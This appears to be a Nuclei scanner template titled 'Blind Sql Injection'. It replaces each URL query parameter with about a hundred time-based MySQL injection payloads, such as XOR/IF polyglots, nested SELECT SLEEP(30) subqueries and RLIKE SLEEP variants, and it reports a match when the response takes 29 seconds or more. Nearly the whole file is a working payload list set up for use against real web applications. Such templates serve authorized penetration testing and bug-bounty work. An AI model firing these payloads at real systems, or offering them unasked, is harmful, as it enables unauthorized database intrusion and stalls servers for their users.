id: blind-sqli

info:
  name: Blind Sql Injection
  author: sabir
  severity: high
  tags: sqli,bsqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    payloads:
      wordlist:
        - "0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z"
        - "0'XOR(if(now()=sysdate(),sleep(30*1),0))XOR'Z"
        - "if(now()=sysdate(),sleep(30),0)"
        - "'XOR(if(now()=sysdate(),sleep(30),0))XOR'"
        - "'XOR(if(now()=sysdate(),sleep(30*1),0))OR'"
        - "0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z"
        - "0'or(now()=sysdate()&&SLEEP(1))or'Zif(now()=sysdate(),sleep(30),0)/\"XOR(if(now()=sysdate(),sleep(30),0))OR\"/if(now()=sysdate(),sleep(30),0)/*'XOR(if(now()=sysdate(),sleep(30),0))OR'\"XOR(if(now()=sysdate(),sleep(30),0))OR\"*/if(now()=sysdate(),sleep(30),0)/'XOR(if(now()=sysdate(),sleep(30),0))OR'\"XOR(if(now()=sysdate(),sleep(30),0) and 30=30)\"/if(1=1,sleep(30),0)/*'XOR(if(1=1,sleep(30),0))OR'\"XOR(if(1=1,sleep(30),0))OR\"*/if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'\"XOR(if(1337=1337,sleep(30),0))OR\"*/SLEEP(30)/*' or SLEEP(30) or '\" or SLEEP(30) or \"*/%2c(select%30*%30from%30(select(sleep(30)))a)"
        - "(select(0)from(select(sleep(30)))v)"
        - "(SELECT SLEEP(30))"
        - "'%2b(select*from(select(sleep(30)))a)%2b'"
        - "(select*from(select(sleep(30)))a)"
        - "1'%2b(select*from(select(sleep(30)))a)%2b'"
        - ",(select * from (select(sleep(30)))a)"
        - "desc%2c(select*from(select(sleep(30)))a)"
        - "-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(30))A))"
        - "1 and sleep 30--"
        - "1 and sleep 30"
        - "1 and sleep(30)--"
        - "1 and sleep(30)"
        - "' and sleep 30--'"
        - "' and sleep 30"
        - "' and sleep 30 and '1'='1'"
        - "' and sleep(30) and '1'='1'"
        - "' and sleep(30)--'"
        - "' and sleep(30)"
        - "' AnD SLEEP(30) ANd '1"
        - "1 AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)"
        - "1 AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND (1337=1337"
        - "1 AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)-- 1337"
        - "' AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND '1337'='1337"
        - "') AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND ('PBiy'='PBiy"
        - ") AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)-- 1337"
        - ") AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND (1337=1337"
        - ")) AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND ((1337=1337"
        - "))) AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND (((1337=1337"
        - "1 AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)# 1337"
        - ") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)-- 1337"
        - "1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)-- 1337"
        - "+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY))+"
        - ")) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)-- 1337"
        - ") AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)-- 1337"
        - "` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)-- 1337"
        - "`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)-- 1337"
        - "`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND `1`=`1"
        - "]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY))|[1"
        - "') AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)-- 1337"
        - "' AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)-- 1337"
        - "' AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)-- 1337"
        - "') AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND ('1337'='1337"
        - "')) AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND (('1337'='1337"
        - "'))) AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND ((('1337'='1337"
        - "' AND (SELECT 3122 FROM (SELECT(SLEEP(30)))YYYY) AND '1337'='1337"
        - "') AND (SELECT 4796 FROM (SELECT(SLEEP(30)))YYYY) AND ('1337'='1337"
        - "')) AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND (('1337' LIKE '1337"
        - "'))) AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND ((('1337' LIKE '1337"
        - "%' AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND '1337%'='1337"
        - "' AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND '1337' LIKE '1337"
        - "') AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND (\"1337\"=\"1337"
        - "')) AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND ((\"1337\"=\"1337"
        - "'))) AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND ((\"1337\"=\"1337"
        - "' AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND \"1337\"=\"1337"
        - "') AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND (\"1337\" LIKE \"1337"
        - "')) AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND ((\"1337\" LIKE \"1337"
        - "'))) AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND ((\"1337\" LIKE \"1337"
        - "' AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) AND \"1337\" LIKE \"1337"
        - "' AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY) OR '1337'='1337"
        - "') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)-- 1337"
        - "') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(30)))YYYY)-- 1337"
        - "RLIKE SLEEP(30)--"
        - "' RLIKE SLEEP(30)--"
        - "' RLIKE SLEEP(30)-- 1337"
        - "' RLIKE SLEEP(30)-- 1337"
        - "') RLIKE SLEEP(30)-- 1337"
        - "') RLIKE SLEEP(30) AND ('1337'='1337"
        - "')) RLIKE SLEEP(30) AND (('1337'='1337"
        - "'))) RLIKE SLEEP(30) AND ((('1337'='1337"
        - ") RLIKE SLEEP(30)-- 1337"
        - ") RLIKE SLEEP(30) AND (1337=1337"
        - ")) RLIKE SLEEP(30) AND ((1337=1337"
        - "))) RLIKE SLEEP(30) AND (((1337=1337"
        - "1 RLIKE SLEEP(30)"
        - "1 RLIKE SLEEP(30)-- 1337"
        - "1 RLIKE SLEEP(30)# 1337"
        - ") WHERE 1337=1337 RLIKE SLEEP(30)-- 1337"
        - "1 WHERE 1337=1337 RLIKE SLEEP(30)-- 1337"
        - "+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(30))+"
        - ")) AS 1337 WHERE 1337=1337 RLIKE SLEEP(30)-- 1337"
        - ") AS 1337 WHERE 1337=1337 RLIKE SLEEP(30)-- 1337"
        - "` WHERE 1337=1337 RLIKE SLEEP(30)-- 1337"
        - "`) WHERE 1337=1337 RLIKE SLEEP(30)--"

    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{wordlist}}"

    matchers:
      - type: dsl
        dsl:
          - 'duration>=29'

